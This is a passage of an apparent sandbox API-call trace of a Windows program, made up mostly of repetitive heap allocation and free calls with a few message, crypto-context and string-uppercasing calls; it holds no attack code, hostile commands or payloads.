(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0201.202] CryptReleaseContext (hProv=0xad63f8, dwFlags=0x0) returned 1 [0201.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0201.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa098 [0201.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0201.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0201.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0201.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0201.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0201.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0201.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0201.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0201.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0201.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0201.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0201.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0201.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0201.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0201.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0201.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0201.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0201.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0201.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0201.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0201.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0201.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0201.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0201.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0201.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0201.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0201.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0201.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0201.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0201.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0201.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0201.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0201.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0201.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0201.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0201.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0201.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0201.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0201.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0201.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0201.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0201.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0201.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0201.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0201.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0201.204] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0201.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0201.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0201.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0201.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0201.205] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0201.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0201.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0201.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0201.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0201.205] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0201.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0201.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0201.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0201.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0201.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0201.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0201.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0201.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0201.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0201.205] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0201.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0201.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0201.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0201.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0201.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0201.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0201.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0201.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0201.206] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0201.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0201.206] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0201.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0201.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0201.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0201.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0201.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0201.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0201.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0201.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0201.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0201.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0201.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0201.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0201.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0201.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0201.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0201.207] FreeLibrary (hLibModule=0x74d40000) returned 1 [0201.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0201.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0201.207] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0201.207] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0201.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0201.207] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0201.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0201.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0201.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0201.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0201.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0201.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0201.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0201.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0201.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0201.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0201.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0201.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0201.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0201.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0201.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0201.208] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0201.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0201.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0201.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0201.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0201.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0201.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0201.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0201.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0201.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0201.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0201.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0201.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0201.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0201.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0201.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0201.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0201.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa098 [0201.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0201.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0201.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0201.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0201.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0201.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0201.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0201.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0201.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0201.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0201.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0201.210] CloseHandle (hObject=0x2c0) returned 1 [0201.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0201.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0201.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0201.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0201.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0201.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0201.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0201.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0201.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0201.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0201.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0201.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0201.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0201.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0201.211] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0201.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0201.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0201.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0201.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0201.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0201.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0201.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0201.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0201.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0201.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0201.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0201.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0201.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0201.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0201.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0201.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0201.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0201.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0201.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0201.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0201.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0201.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0201.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0201.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0201.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0201.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 